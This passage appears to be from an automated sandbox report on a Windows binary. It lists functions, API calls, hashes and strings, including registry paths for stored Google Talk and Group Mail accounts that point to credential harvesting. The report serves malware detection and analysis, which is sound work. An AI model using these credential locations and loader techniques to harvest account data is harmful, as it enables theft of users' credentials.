                                                                                                                  control_flow_graph 347 4034e4-403544 memset * 2 call 410b1e 350 403580-403582 347->350 351 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 347->351 351->350
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403504
                                                                                                                  • memset.MSVCRT ref: 0040351A
                                                                                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                  • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                  • _mbscat.MSVCRT ref: 0040356D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                  • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                  • API String ID: 3071782539-966475738
                                                                                                                  • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                  • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                  • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                  • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                                  Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 356 40ccd7-40cd06 ??2@YAPAXI@Z 357 40cd08-40cd0d 356->357 358 40cd0f 356->358 359 40cd11-40cd24 ??2@YAPAXI@Z 357->359 358->359 360 40cd26-40cd2d call 404025 359->360 361 40cd2f 359->361 363 40cd31-40cd57 360->363 361->363 365 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 363->365 366 40cd59-40cd60 DeleteObject 363->366 366->365
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                                  • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                                  • memset.MSVCRT ref: 0040CD96
                                                                                                                  • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2054149589-0
                                                                                                                  • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                  • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                  • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                  • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                  Function 0044B40E Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 373 44b40e-44b415 GetModuleHandleA 374 44b455 373->374 375 44b417-44b426 call 44b42b 373->375 377 44b457-44b45b 374->377 384 44b48d 375->384 385 44b428-44b433 GetProcAddress 375->385 379 44b45d-44b465 GetModuleHandleA 377->379 380 44b49a call 44b49f 377->380 383 44b467-44b46f 379->383 383->383 386 44b471-44b474 383->386 388 44b48e-44b496 384->388 385->374 389 44b435-44b442 VirtualProtect 385->389 386->377 387 44b476-44b478 386->387 390 44b47e-44b486 387->390 391 44b47a-44b47c 387->391 397 44b498 388->397 393 44b454 389->393 394 44b444-44b452 VirtualProtect 389->394 395 44b487-44b488 GetProcAddress 390->395 391->395 393->374 394->393 395->384 397->386
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                  • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                    • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                    • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                    • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2099061454-0
                                                                                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                  • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                  • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                                  Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                    • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                    • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                  • memset.MSVCRT ref: 00408620
                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                  • memset.MSVCRT ref: 00408671
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                  Strings
                                                                                                                  • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                  • String ID: Software\Google\Google Talk\Accounts
                                                                                                                  • API String ID: 1366857005-1079885057
                                                                                                                  • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                  • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                  • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                  • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                  Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 421 40ba28-40ba3a 422 40ba87-40ba9b call 406c62 421->422 423 40ba3c-40ba52 call 407e20 _mbsicmp 421->423 445 40ba9d call 4107f1 422->445 446 40ba9d call 404734 422->446 447 40ba9d call 404785 422->447 448 40ba9d call 403c16 422->448 449 40ba9d call 410a9c 422->449 428 40ba54-40ba6d call 407e20 423->428 429 40ba7b-40ba85 423->429 434 40ba74 428->434 435 40ba6f-40ba72 428->435 429->422 429->423 430 40baa0-40bab3 call 407e30 438 40bab5-40bac1 430->438 439 40bafa-40bb09 SetCursor 430->439 437 40ba75-40ba76 call 40b5e5 434->437 435->437 437->429 441 40bac3-40bace 438->441 442 40bad8-40baf7 qsort 438->442 441->442 442->439 445->430 446->430 447->430 448->430 449->430
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor_mbsicmpqsort
                                                                                                                  • String ID: /nosort$/sort
                                                                                                                  • API String ID: 882979914-1578091866
                                                                                                                  • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                  • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                  • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                  • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                  Function 0044B3CF Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                    • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                    • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                    • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                    • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2099061454-0
                                                                                                                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                  • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                  • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                  Function 0044B42B Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                  • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                  • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                  • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2152742572-0
                                                                                                                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                  • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                  • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                  Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,76270A60,?,00000000), ref: 00410D1C
                                                                                                                    • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                  • memset.MSVCRT ref: 00410E10
                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                  • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                  Strings
                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                  • API String ID: 889583718-2036018995
                                                                                                                  • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                  • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                  • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                  • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                  Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3473537107-0
                                                                                                                  • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                  • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                  • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                  • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                  Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004109F7
                                                                                                                    • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                    • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                  • memset.MSVCRT ref: 00410A32
                                                                                                                  • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3143880245-0
                                                                                                                  • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                  • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                  • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                  • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                  Function 00406F30 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • malloc.MSVCRT ref: 00406F4C
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,`'v,00407A43,00000001,?,00000000,`'v,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                  • free.MSVCRT ref: 00406F6D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                  • String ID: `'v
                                                                                                                  • API String ID: 3056473165-1951845285
                                                                                                                  • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                  • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                  • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                  • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                  Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 613200358-0
                                                                                                                  • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                  • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                  • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                  • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                  Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76270A60), ref: 00408D5C
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76270A60), ref: 00408D7A
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76270A60), ref: 00408D98
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76270A60), ref: 00408DA8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1033339047-0
                                                                                                                  • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                  • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                  • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                  • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                  Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                  • String ID: Arial
                                                                                                                  • API String ID: 3853255127-493054409
                                                                                                                  • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                  • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                                  • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                  • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                                  Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                  • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$_strcmpimemset
                                                                                                                  • String ID: /stext
                                                                                                                  • API String ID: 520177685-3817206916
                                                                                                                  • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                  • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                  • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                  • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                  Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                  • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
